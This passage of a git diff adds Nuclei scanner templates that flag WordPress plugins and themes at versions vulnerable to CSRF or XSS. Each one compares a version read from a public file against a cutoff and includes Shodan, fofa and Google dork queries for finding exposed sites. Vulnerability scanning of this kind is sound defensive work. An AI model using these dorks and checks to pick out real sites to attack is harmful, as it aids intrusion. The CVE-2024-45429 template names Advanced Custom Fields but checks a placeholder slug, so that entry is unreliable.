'vuln:CVE-2024-3673' + tags: cve,wordpress,wp-plugin,web-directory-free,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/web-directory-free/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "web-directory-free" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-38763-36ed147d9204dfa5b9ca29204c678752.yaml b/poc/cve/CVE-2024-38763-36ed147d9204dfa5b9ca29204c678752.yaml new file mode 100644 index 0000000000..3858945c82 --- /dev/null +++ b/poc/cve/CVE-2024-38763-36ed147d9204dfa5b9ca29204c678752.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-38763-36ed147d9204dfa5b9ca29204c678752 + +info: + name: > + Popularis Verse <= 1.0.1 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Popularis Verse theme for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/14250ff2-66e4-48f9-8f73-7f245079134c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-38763 + metadata: + fofa-query: "wp-content/themes/popularis-verse/" + google-query: inurl:"/wp-content/themes/popularis-verse/" + shodan-query: 'vuln:CVE-2024-38763' + tags: cve,wordpress,wp-theme,popularis-verse,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/popularis-verse/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "popularis-verse" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3899-f75ea98633e652b4cb25f75a92267ca3.yaml b/poc/cve/CVE-2024-3899-f75ea98633e652b4cb25f75a92267ca3.yaml new file mode 100644 index 0000000000..bef4813c0f --- /dev/null +++ b/poc/cve/CVE-2024-3899-f75ea98633e652b4cb25f75a92267ca3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-3899-f75ea98633e652b4cb25f75a92267ca3 + +info: + name: > + Gallery Plugin for WordPress – Envira Photo Gallery <= 1.8.14 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Gallery Plugin for WordPress – Envira Photo Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the gallery image title field in all versions up to, and including, 1.8.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6788b92c-8a2c-4ebb-85ca-eb1fd0f3b0e0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-3899 + metadata: + fofa-query: "wp-content/plugins/envira-gallery-lite/" + google-query: inurl:"/wp-content/plugins/envira-gallery-lite/" + shodan-query: 'vuln:CVE-2024-3899' + tags: cve,wordpress,wp-plugin,envira-gallery-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/envira-gallery-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "envira-gallery-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43255-91eefecce0a74f93379bfae7b9f8769a.yaml b/poc/cve/CVE-2024-43255-91eefecce0a74f93379bfae7b9f8769a.yaml new file mode 100644 index 0000000000..845ddb5fbe --- /dev/null +++ b/poc/cve/CVE-2024-43255-91eefecce0a74f93379bfae7b9f8769a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43255-91eefecce0a74f93379bfae7b9f8769a + +info: + name: > + MyBookTable Bookstore <= 3.4.0 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The MyBookTable Bookstore plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4.0. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to update plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b614aab2-a3e3-410a-917b-cc33634503ce?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43255 + metadata: + fofa-query: "wp-content/plugins/mybooktable/" + google-query: inurl:"/wp-content/plugins/mybooktable/" + shodan-query: 'vuln:CVE-2024-43255' + tags: cve,wordpress,wp-plugin,mybooktable,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mybooktable/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mybooktable" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.4.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-45269-87676ca600bde6a78ec815da9ddc8eb7.yaml b/poc/cve/CVE-2024-45269-87676ca600bde6a78ec815da9ddc8eb7.yaml new file mode 100644 index 0000000000..66cc08ce9c --- /dev/null +++ b/poc/cve/CVE-2024-45269-87676ca600bde6a78ec815da9ddc8eb7.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-45269-87676ca600bde6a78ec815da9ddc8eb7 + +info: + name: > + Carousel Slider <= 1.10.2 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Carousel Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.10.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to manipulate data from the image selection feature via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d372fbca-47c8-45b8-b5cb-83b8367860f4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-45269 + metadata: + fofa-query: "wp-content/plugins/carousel-slider/" + google-query: inurl:"/wp-content/plugins/carousel-slider/" + shodan-query: 'vuln:CVE-2024-45269' + tags: cve,wordpress,wp-plugin,carousel-slider,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/carousel-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "carousel-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.10.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-45270-ff7911032b65570055c615564e945f75.yaml b/poc/cve/CVE-2024-45270-ff7911032b65570055c615564e945f75.yaml new file mode 100644 index 0000000000..fa277e7535 --- /dev/null +++ b/poc/cve/CVE-2024-45270-ff7911032b65570055c615564e945f75.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-45270-ff7911032b65570055c615564e945f75 + +info: + name: > + Carousel Slider <= 2.2.3 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Carousel Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.3. This is due to missing or incorrect nonce validation on the add_slide_template() function. This makes it possible for unauthenticated attackers to add slides via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dbc60daa-c093-4cd6-8f07-d9015e2bd957?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-45270 + metadata: + fofa-query: "wp-content/plugins/carousel-slider/" + google-query: inurl:"/wp-content/plugins/carousel-slider/" + shodan-query: 'vuln:CVE-2024-45270' + tags: cve,wordpress,wp-plugin,carousel-slider,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/carousel-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "carousel-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-45429-c5b50a2727f0a5beb04680b6d713ea8e.yaml b/poc/cve/CVE-2024-45429-c5b50a2727f0a5beb04680b6d713ea8e.yaml new file mode 100644 index 0000000000..6a65360ada --- /dev/null +++ b/poc/cve/CVE-2024-45429-c5b50a2727f0a5beb04680b6d713ea8e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-45429-c5b50a2727f0a5beb04680b6d713ea8e + +info: + name: > + Advanced Custom Fields <= 6.3.5 - Authenticated Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Advanced Custom Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via field groups in all versions up to, and including, 6.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with the 'capability' setting privilege, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/51178e18-ae8b-4a7f-974d-23346a8dbc52?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 5.5 + cve-id: CVE-2024-45429 + metadata: + fofa-query: "wp-content/plugins/UNKNOWN-CVE-2023-40068-1/" + google-query: inurl:"/wp-content/plugins/UNKNOWN-CVE-2023-40068-1/" + shodan-query: 'vuln:CVE-2024-45429' + tags: cve,wordpress,wp-plugin,UNKNOWN-CVE-2023-40068-1,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/UNKNOWN-CVE-2023-40068-1/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "UNKNOWN-CVE-2023-40068-1" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.3.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml b/poc/cve/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml new file mode 100644 index 0000000000..fd670e2f81 --- /dev/null +++ b/poc/cve/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5 + +info: + name: > + Forminator Forms – Contact Form, Payment Form & Custom Form Builder <= 1.34.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.34.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/64e14944-db83-413f-82a3-cda594398c7e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-45625 + metadata: + fofa-query: "wp-content/plugins/forminator/" + google-query: inurl:"/wp-content/plugins/forminator/" + shodan-query: 'vuln:CVE-2024-45625' + tags: cve,wordpress,wp-plugin,forminator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "forminator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.34.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5561-b3779d524422cb5f6e75ef5f028e49f8.yaml b/poc/cve/CVE-2024-5561-b3779d524422cb5f6e75ef5f028e49f8.yaml new file mode 100644 index 0000000000..fc3fd756a0 --- /dev/null +++ b/poc/cve/CVE-2024-5561-b3779d524422cb5f6e75ef5f028e49f8.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5561-b3779d524422cb5f6e75ef5f028e49f8 + +info: + name: > + Popup Maker <= 1.19.0 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.19.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f111c87e-e1e8-45df-ab92-0a81e32467b4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-5561 + metadata: + fofa-query: "wp-content/plugins/popup-maker/" + google-query: inurl:"/wp-content/plugins/popup-maker/" + shodan-query: 'vuln:CVE-2024-5561' + tags: cve,wordpress,wp-plugin,popup-maker,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/popup-maker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "popup-maker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.19.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5567-a55055fd86860f71a8b1255aa0514d09.yaml b/poc/cve/CVE-2024-5567-a55055fd86860f71a8b1255aa0514d09.yaml new file mode 100644 index 0000000000..76d584ea08 --- /dev/null +++ b/poc/cve/CVE-2024-5567-a55055fd86860f71a8b1255aa0514d09.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5567-a55055fd86860f71a8b1255aa0514d09 + +info: + name: > + Betheme | Responsive Multipurpose WordPress & WooCommerce Theme <= 27.5.5 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File + author: topscoder + severity: low + description: > + The Betheme theme for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 27.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5dfaa23f-05df-423c-a5f6-02f2b714b5b6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5567 + metadata: + fofa-query: "wp-content/themes/betheme/" + google-query: inurl:"/wp-content/themes/betheme/" + shodan-query: 'vuln:CVE-2024-5567' + tags: cve,wordpress,wp-theme,betheme,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/betheme/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "betheme" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 27.5.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml b/poc/cve/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml new file mode 100644 index 0000000000..e59c486d50 --- /dev/null +++ b/poc/cve/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5628-1341f1db3b0e886d8e7026974e839398 + +info: + name: > + Avada | Website Builder For WordPress & eCommerce <= 3.11.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via fusion_button Shortcode + author: topscoder + severity: low + description: > + The Avada | Website Builder For WordPress & eCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's fusion_button shortcode in all versions up to, and including, 3.11.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially fixed in 3.11.9. Additional hardening for alternate attack vectors was added to version 3.11.10. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7c23bd29-ba02-4c90-a631-5ce6294d7760?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5628 + metadata: + fofa-query: "wp-content/plugins/fusion-builder/" + google-query: inurl:"/wp-content/plugins/fusion-builder/" + shodan-query: 'vuln:CVE-2024-5628' + tags: cve,wordpress,wp-plugin,fusion-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fusion-builder/languages/fusion-builder.pot" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Project-Id-Version: Avada Builder ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Project-Id-Version: Avada Builder ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fusion-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.11.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5789-aefcab5998ef352002c627c10b26cbb1.yaml b/poc/cve/CVE-2024-5789-aefcab5998ef352002c627c10b26cbb1.yaml new file mode 100644 index 0000000000..78125c2d67 --- /dev/null +++ b/poc/cve/CVE-2024-5789-aefcab5998ef352002c627c10b26cbb1.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5789-aefcab5998ef352002c627c10b26cbb1 + +info: + name: > + Triton Lite <= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Button Shortcode + author: topscoder + severity: low + description: > + The Triton Lite theme for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute within the theme's Button shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/049efe5a-3f68-46ad-b73a-1892f03c9d1d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5789 + metadata: + fofa-query: "wp-content/themes/triton-lite/" + google-query: inurl:"/wp-content/themes/triton-lite/" + shodan-query: 'vuln:CVE-2024-5789' + tags: cve,wordpress,wp-theme,triton-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/triton-lite/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "triton-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5867-c6c99bf3f91229f19ab5549c865f8aea.yaml b/poc/cve/CVE-2024-5867-c6c99bf3f91229f19ab5549c865f8aea.yaml new file mode 100644 index 0000000000..77021e6bb9 --- /dev/null +++ b/poc/cve/CVE-2024-5867-c6c99bf3f91229f19ab5549c865f8aea.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5867-c6c99bf3f91229f19ab5549c865f8aea + +info: + name: > + Delicate <= 3.5.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via Button Shortcode + author: topscoder + severity: low + description: > + The Delicate theme for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' parameter within the theme's Button shortcode in all versions up to, and including, 3.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dbf491d6-e546-4e3f-88c2-237b647a2b1e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5867 + metadata: + fofa-query: "wp-content/themes/delicate/" + google-query: inurl:"/wp-content/themes/delicate/" + shodan-query: 'vuln:CVE-2024-5867' + tags: cve,wordpress,wp-theme,delicate,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/delicate/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "delicate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5869-611101c87cbed518f9857873a13fd418.yaml b/poc/cve/CVE-2024-5869-611101c87cbed518f9857873a13fd418.yaml new file mode 100644 index 0000000000..7f5d74e17a --- /dev/null +++ b/poc/cve/CVE-2024-5869-611101c87cbed518f9857873a13fd418.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5869-611101c87cbed518f9857873a13fd418 + +info: + name: > + Neighborly <= 1.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Button Shortcode + author: topscoder + severity: low + description: > + The Neighborly theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter within the theme's Button shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f65834c6-6da7-4033-aa2a-a4926d6c955d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5869 + metadata: + fofa-query: "wp-content/themes/neighborly/" + google-query: inurl:"/wp-content/themes/neighborly/" + shodan-query: 'vuln:CVE-2024-5869' + tags: cve,wordpress,wp-theme,neighborly,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/neighborly/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "neighborly" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5870-72d352e62d854d49b010539851855ac0.yaml b/poc/cve/CVE-2024-5870-72d352e62d854d49b010539851855ac0.yaml new file mode 100644 index 0000000000..6df7fe2023 --- /dev/null +++ b/poc/cve/CVE-2024-5870-72d352e62d854d49b010539851855ac0.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5870-72d352e62d854d49b010539851855ac0 + +info: + name: > + Tweaker5 <= 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Button Shortcode + author: topscoder + severity: low + description: > + The Tweaker5 theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter within the theme's Button shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f70ba568-b013-4177-928a-eefb606333ee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5870 + metadata: + fofa-query: "wp-content/themes/tweaker5/" + google-query: inurl:"/wp-content/themes/tweaker5/" + shodan-query: 'vuln:CVE-2024-5870' + tags: cve,wordpress,wp-theme,tweaker5,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/tweaker5/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tweaker5" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml b/poc/cve/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml new file mode 100644 index 0000000000..0345df64fa --- /dev/null +++ b/poc/cve/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e + +info: + name: > + Beauty <= 1.1.4 - Authenticated (Subscriber+) Stored Cross-Site Scripting via tpl_featured_cat_id Parameter + author: topscoder + severity: low + description: > + The Beauty theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘tpl_featured_cat_id’ parameter in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c1089958-a481-47b1-9dc6-799a1a7930c8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5884 + metadata: + fofa-query: "wp-content/themes/beauty/" + google-query: inurl:"/wp-content/themes/beauty/" + shodan-query: 'vuln:CVE-2024-5884' + tags: cve,wordpress,wp-theme,beauty,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/beauty/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beauty" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.4') \ No newline at end of file diff --git 